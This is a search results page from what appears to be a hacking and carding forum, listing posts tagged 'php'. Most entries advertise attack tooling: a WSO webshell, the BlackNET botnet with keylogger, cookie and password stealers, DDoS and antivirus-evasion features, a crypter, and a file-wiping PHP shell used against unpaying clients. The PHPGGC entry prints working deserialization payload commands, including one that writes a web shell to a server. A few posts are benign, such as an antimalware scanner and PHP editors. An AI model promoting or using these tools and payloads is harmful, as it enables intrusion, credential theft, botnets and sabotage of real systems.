Search the Community

Showing results for tags 'php'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Staff Control
    • Staff Announcements
    • Moderators
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
  • Security & Anonymity
  • Operating Systems | Hardware | Programs
  • Graphic Design
  • vBCms Comments
  • live stream tv
  • Marketplace
  • Premium Accounts
  • Modders Section
  • PRIV8-Section
  • Cracking Zone PRIV8
  • Carding Zone PRIV8


There are no results to display.

There are no results to display.

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start



About Me










Found 69 results

  1. itsMe

    WSO php webshell

    WSO php webshell New Design: most Beautiful php 7.x issue resolved Easy to use Password login protection Server Infection possibility Managing SQL Databases No Tracker More useful features... [HIDE][Hidden Content]]
  2. itsMe

    PHP Antimalware Scanner v0.5.0.68

    AMWSCAN – PHP Antimalware Scanner PHP Antimalware Scanner, written in php, can scan PHP files and analyze your project to find malicious code inside it. It provides a text terminal console interface to scan files in a given directory and find PHP code files the seem to contain malicious code. The package can also scan the PHP files without outputting anything to the terminal console. In that case, the results are stored in a log file. This scanner can work on your own php projects and on a lot of other platforms. Use this command php -d disable_functions for running the program without issues. Changelog v0.5.0.68 New choice function New PHAR build system Fix windows bug on read Fix notice and warnings Fix some possible issues [HIDE][Hidden Content]]
  3. BlackNET Free advanced and modern Windows botnet with a nice and secure PHP panel built using VB.NET. About BlackNET Free advanced and modern Windows botnet with a nice and secure PHP panel built using VB.NET. this botnet controller comes with a lot of features and the most secure panel for free Developed By: Black.Hacker What You Can Do Upload File Open Webpage [Visiable, Hidden] Show MessageBox Take Screenshot Steal Firefox Cookies Steal Saved Passwords Steal Chrome Cookies Execute Scripts Keylogger Computer operations [ Restart, Shutdown, Logout ] Uninstall Client Move Client Blacklist Client Update Client Close Client Requirements PHP >= 5.6 NET Framework Stub >= 2.0 Builder >= 4.0 How to Install PHP Panel Clone the Repo Compress BlackNET panel folder and upload it to your hosting Create a database with any name you want Change the data in classes/database.php Change files and folders permission to 777 [ Uploads Folder] Go to install.php to create the botnet tables automatically What's New - Another Big and Stable Update v2.0.0 + PHP - Now the PHP Panel is compatiable with 000webhost - Added the Ability to disable the panel - Using PHPMailer is not required - Better and Cleaner Code - CSRF Protection - Session Hijacking Protection - XSS Protection - Added viewuploads.php to view uploads folder - Better and Faster Connection Method - Check if Client is from USB Infection - UI Enhancements - Better Session handling - Securing session with the password and current IP - Better redirection handling - Remover Clinet Folder after Executing Uninstall - New Menues [ Execute Scripts ] - Update PHPMailer to 6.1.4 - Merged Login and Auth in one Class - Self Expire 2FA Code after 10 minutes - Self Expire Forget Password Token after 10 minutes - Added Scripts Folder to Manage Execute Scripts Function - Better Command Receive System - Better, Cleaner and Faster Authentication System - View Encrypted Passwords in a Table [Website,Username,Password] - Added check if client is admin - Added gethostbyname() function to sendcommand.php - Fixed some Database Issues + Merged question with admin tables - New POST Class to Handle Socket Requests + Prepare Objects + Validate Strings + Write to a File - Rewrite All Menues - Update Bootstrap to 4.4.1 - Bug Fixes + VB.NET - Added check panel function - One Webclient to rule them all - Update .NET Framework for the Builder 2.0 to 4.0 - Update Mono.Cecil to v0.11.1 - Better and Cleaner Code - Better Client Update System - Added Self Destroy to Uninstall Function - UI Enhancements - Added Chrome Cookies Stealer - Update PasswordStealer DLL + DLL is now less the 30kb and 1/26 FUD + DLL does not use Nirsoft tools + Comes with Chrome Stealer and FileZilla Stealer + Modified to Steal from All Chrome-based Browsers - Speed Optimization - Update Checker - Added schtask function + choose between startup or schtask - Encrypted C2 Connection (Base64) - Bind and Execute File with output ( Dropper ) - Dropbox Spread - Fix DDOS Bugs { IP Only } - Elevate Client ( UAC ) - Added Obfuscate output using ConfuserEx - Fixed some RSA Encryption Bugs - Restart Client Connection - Execute Script + bat + vbs + ps1 - Computer Commands + Shutdown + Restart + Logoff - Bug Fixes [HIDE][Hidden Content]]
  4. Lightweight PHP editor and PHP IDE Designed to make you more productive Rapid PHP editor is a faster and more powerful PHP code editor for Windows combining features of a fully-packed PHP IDE with the speed of the Notepad. Rapid PHP is the most complete all-in-one software for coding PHP, HTML, CSS, JavaScript and other web development languages with tools for debugging, validating, reusing, navigating and formatting your code. What's new in the Rapid PHP editor version 2020? [Hidden Content] [HIDE][Hidden Content]]
  5. BlackNET Free Advanced MultiOS with a Secure PHP Interface Botnet with VB.NET and Python based Stub and VB.NET Builder About BlackNET BlackNET is an advanced botnet with PHP Panel and VB.NET or Python Output for MultiOS Hacking Developed By: Black.Hacker What You Can Do On Windows - Upload File - DDOS Attack [ TCP,UDP,ARME,Slowloris ] - Open Webpage - Show MessageBox - Take Screenshot - Steal Firefox Cookies - Steal Saved Passwords - Keylogger - Uninstall Client - Move Client - Blacklist Client - Close Client On Linux - Print Simple Message for Client - Open Webpage - Upload File - Simple DDOS Attack - Execute Shell Commands - Uninstall Client - Close Client v1.0.0 + PHP Panel - Simple Stats - Bugs Fixes - UI Enhancements - Select all button - Map Visualization - Fixed Some Database Issues - New Menu [ Move Client,Execute Shell] - Ability to change admin username - reCAPTCHA Integration - Security Enhancements - Added Security Questions - Updating the Hashing System MD5 to SHA256 - New and Stronger Salt - 2FA Implementation [ Code by Email ] - Secure Reset Password System [ Recover your password if you forget it ] - upload.php to Upload files to the network - PHPMailer Integration with SMTP Settings - Password Stealer Plugin - Better [ Country Code to Country Name ] Function + VB.NET - RSA Encryption for BlackNET Panel URL - Move client to another Host - Take screenshot every 10 seconds - Firefox Cookies Stealer - Keylogger Module - Check Blacklist - Update the junk code - Speed Optimization - Plugin Helper Function - Password Stealer Function - Stealth Mode Function - Bug Fixs + Python - Updated to v1.0.0 - Malware Builder - Execute Shell Commands - Bug fixes [HIDE][Hidden Content]] Server Scan
  6. Cash Matics is a premium script for Online Merchants that deals with Cryptocurrency Sales, Gift Cards Sales, Loan Management, Investment Management, Savings Account System and lots more. It was built using Laravel Framework for better security with fool proof algorithm. We have carefully developed this system to ensure that smooth running of your business online is well cultured and safe from unauthorised access. Demo: [Hidden Content] [Hidden Content]
  7. BlackNET A Free MultiOS PHP Interface Botnet with VB.NET and Python based Stub and VB.NET Builder About BlackNET BlackNET is a simple botnet with PHP Panel and VB.NET or Python Output for MultiOS Hacking Created By : DarkSoftwareCo What You Can Do On Windows Upload File DDOS Attack [ TCP,UDP,ARME,Slowloris ] Open Webpage Show MessageBox Uninstall Client Close Client On Linux Print Simple Message for Client Open Webpage Upload File Simple DDOS Attack Uninstall Client Close Client Python Stub You Can use it to hack any Linux system with python on it How to Install PHP Panel Download BlackNET - PHP Upload The ZIP File to your Server Extract it Go to PHPMyAdmin Create a database with any name you want Change the data in classes/database.php Change files and folders permission to 777 [connection.php,sendcommand.php,receive.php,Clients Folder] Go to install.php to create the botnet tables automatically Enter you network and enjoy hacking What's New v0.5 - Stable Connection - Cleaner Code - Secure Database Connection - Admin Settings - Better and Secure Login System - Salted MD5 Hashing - Rewrite Project in OOP with PDO Connection - Bug Fixed - SQL Injection Fixed YouTube - How To Install & Download File [Hidden Content]
  8. 0x1


    ezXSS ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. Current features Some features ezXSS has Easy to use dashboard with statics, payloads, view/share/search reports and more Payload generator Instant email alert on payload Custom javascript payload Enable/Disable screenshots Prevent double payloads from saving or alerting Block domains Share reports with a direct link or with other ezXSS users Easily manage and view reports in the dashboard Secure your login with extra protection (2FA) The following information is collected on a vulnerable page: The URL of the page IP Address Any page referer (or share referer) The User-Agent All Non-HTTP-Only Cookies All Locale Storage All Session Storage Full HTML DOM source of the page Page origin Time of execution Screenshot of the page its just ez Required A host with PHP 7.1 or up A domain name (consider a short one) An SSL if you want to test on https websites (consider Cloudflare or Let's Encrypt for a free SSL) Installation ezXSS is ez to install Clone the repository and put the files in the document root Create an empty database and provide your database information in 'src/Database.php' Visit /manage/install in your browser and setup a password and email Done! That was ez right? Demo [Hidden Content] Download [hide][Hidden Content]]
  9. Mr Blog PHP suffers from cross site scripting and remote SQL injection vulnerabilities. View the full article
  10. 0x1


    PHPGGC: PHP Generic Gadget Chains PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically. When encountering an unserialize on a website you don’t have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of Ysoserial, but for PHP. Currently, the tool supports: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework. Requirements Usage Run ./phpggc -l to obtain a list of gadget chains: Every gadget chain has: Name: Name of the framework/library Version: Version of the framework/library for which gadgets are for Type: Type of exploitation: RCE, File Write, File Read, Include… Vector: the vector to trigger the chain after the unserialize (__destruct(), __toString(), offsetGet(), …) Informations: Other informations about the chain Use -i to get detailed information about a chain: $ ./phpggc -i symfony/rce1 Name : Symfony/RCE1 Version : 3.3 Type : rce Vector : __destruct Informations : Exec through proc_open() ./phpggc Symfony/RCE1 <command> Once you have selected a chain, run ./phpggc <gadget-chain> [parameters] to obtain the payload. For instance, to obtain a payload for Monolog, you’d do: $ ./phpggc monolog/rce1 assert 'phpinfo()' O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:2;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:10:"phpinfo();";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"assert";}}} For a file write using SwiftMailer, you’d do: $ echo 'It works !' > /tmp/data $ ./phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data O:13:"Swift_Message":8:{...} Wrapper The --wrapper (-w) option allows you to define a PHP file containing the following functions: process_parameters($parameters): Called right before generate(), allows to change parameters process_object($object): Called right before serialize(), allows to change the object process_serialized($serialized): Called right after serialize(), allows to change the serialized string For instance, if the vulnerable code looks like this: <?php $data = unserialize($_GET['data']); print $data['message']; You could use a __toString() chain, wrapping it like so: <?php # /tmp/my_wrapper.php function process_object($object) { return array( 'message' => $object ); } And you’d call phpggc like so: $ ./phpggc -w /tmp/my_wrapper.php slim/rce1 system id a:1:{s:7:"message";O:18:"Slim\Http\Response":2:{...}} PHAR(GGC) History At BlackHat US 2018, @s_n_t released PHARGGC, a fork of PHPGGC which instead of building a serialized payload, builds a whole PHAR file. This PHAR file contains serialized data and as such can be used for various exploitation techniques (file_exists, fopen, etc.). The paper is here. [Hidden Content] Implementation PHAR archives come in three different formats: PHAR, TAR, and ZIP. The three of them are supported by PHPGGC. Polyglot files can be generated using --phar-jpeg (-pj). Other options are available (use -h). Examples $ # Creates a PHAR file in the PHAR format and stores it in /tmp/z.phar $ ./phpggc -p phar -o /tmp/z.phar monolog/rce1 system id $ # Creates a PHAR file in the ZIP format and stores it in /tmp/ $ ./phpggc -p zip -o /tmp/ monolog/rce1 system id $ # Creates a polyglot JPEG/PHAR file from image /tmp/dummy.jpg and stores it in /tmp/ $ ./phpggc -pj /tmp/dummy.jpg -o /tmp/ monolog/rce1 system id Encoders Arguments allow to modify the way the payload is output. For instance, -u will URL encode it, and -b will convert it to base64. Payloads often contain NULL bytes and cannot be copy/pasted as-is. Use -s for a soft URL encode, which keeps the payload readable. The encoders can be chained, and as such the order is important. For instance, ./phpggc -b -u -u slim/rce1 system id will base64 the payload, then URLencode it twice. Advanced: Enhancements Fast destruct PHPGGC implements a --fast-destruct (-f) flag, that will make sure your serialized object will be destroyed right after the unserialize() call, and not at the end of the script. I’d recommend using it for every __destruct vector, as it improves reliability. For instance, if PHP script raises an exception after the call, the __destruct method of your object might not be called. As it is processed at the same time as encoders, it needs to be set first. $ ./phpggc -f -s slim/rce1 system id a:2:{i:7;O:18:"Slim\Http\Response":2:{s:10:"... ASCII Strings Uses the S serialization format instead of the standard s. This replaces every non-ASCII value to an hexadecimal representation: s:5:"A<null_byte>B<cr><lf>";̀ -> S:5:"A\00B\09\0D"; This can be useful when for some reason non-ascii characters are not allowed (NULL BYTE for instance). Since payloads generally contain them, this makes sure that the payload consists only of ASCII values. Note: this is experimental and it might not work in some cases. Plus Numbers Sometimes, PHP scripts verify that the given serialized payload does not contain objects by using a regex such as /O:[0-9]+:. This is easily bypassed using O:+123:... instead of O:123:. One can use --plus-numbers <types>, or -n <types>, to automatically add these + signs in front of symbols. For instance, to obfuscate objects and strings, one can use: --n Os. Please note that since PHP 7.2, only i and d (float) types can have a +. More info && Download [hide]More info : [Hidden Content] Download : [Hidden Content]]
  11. PayPage is a payment gateways integration script built in PHP. It provides a facility to integrate payment gateways like PayPal, PayTM, Instamojo, Paystack, Stripe, Razorpay, BitPay, Authorize.Net and Iyzico. It is the best solution to integrate these all payment gateways in your PHP application in minimum time. Demo: [Hidden Content] [Hidden Content]
  12. SugarCRM versions 9.0.1 and below suffer from multiple php object injection vulnerabilities. View the full article
  13. SugarCRM versions 9.0.1 and below suffer from multiple PHP code injection vulnerabilities. View the full article
  14. 1337day-Exploits

    PHP 7.3 disable_functions Bypass

    PHP versions 7.0 through 7.3 disable_functions proof of concept exploit. View the full article
  15. 1337day-Exploits

    PHP 7.x disable_functions Bypass

    PHP versions 7.1 up to 7.3 suffer from a disable_functions bypass vulnerability. View the full article
  16. Active PHP Bookmarks version 1.3 suffer from a cookie_auth error-based remote SQL injection vulnerability. View the full article
  17. [Hidden Content]
  18. This Metasploit module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x up to 5.6.29. Remote command execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation. View the full article
  19. dEEpEst

    IRC PHP BOT Simple

    [Hidden Content]
  20. itsMe

    web-based-crypter C & PHP

    Full Source C and Web Files [HIDE][Hidden Content]]
  21. Versionscan - A PHP Version Scanner For Reporting Possible Vulnerabilities Versionscan is a tool for evaluating your currently installed PHP version and checking it against known CVEs and the versions they were fixed in to report back potential issues. PLEASE NOTE: Work is still in progress to adapt the tool to linux distributions that backport security fixes. As of right now, this only reports back for the straight up version reported. [HIDE][Hidden Content]]
  22. This Metasploit module exploits a php object instantiation vulnerability that can lead to remote code execution in Shopware. An authenticated backend user could exploit the vulnerability. The vulnerability exists in the createInstanceFromNamedArguments function, where the code insufficiently performs whitelist check which can be bypassed to trigger an object injection. An attacker can leverage this to deserialize an arbitrary payload and write a webshell to the target system, resulting in remote code execution. Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3. View the full article
  23. Security controls configured via php.ini directives at the PHP_INI_SYSTEM level are ineffective as they could be bypassed by malicious scripts via writing their own process memory on the Linux platform. Proof of concept code included. View the full article
  24. hailmary:~# is a very basic, single-file, PHP shell. It's meant to be a mini destructive tool which you can deploy and destroy files quickly. Use it with caution: this script represents a security risk for the server. It was built for using on remote servers we set for clients who did not pay for the complete product, as consequence hailmary would wipe our product from there. Features: Display directory location where it's placed. Delete all files and folders inside a specified path Commands: WARNING: THIS SCRIPT IS A SECURITY HOLE. DO NOT UPLOAD IT ON A SERVER UNTIL YOU KNOW WHAT YOU ARE DOING! [Hidden Content]
  25. PHP version 7.2 suffers from an imagecolormatch() out-of-band heap write vulnerability. View the full article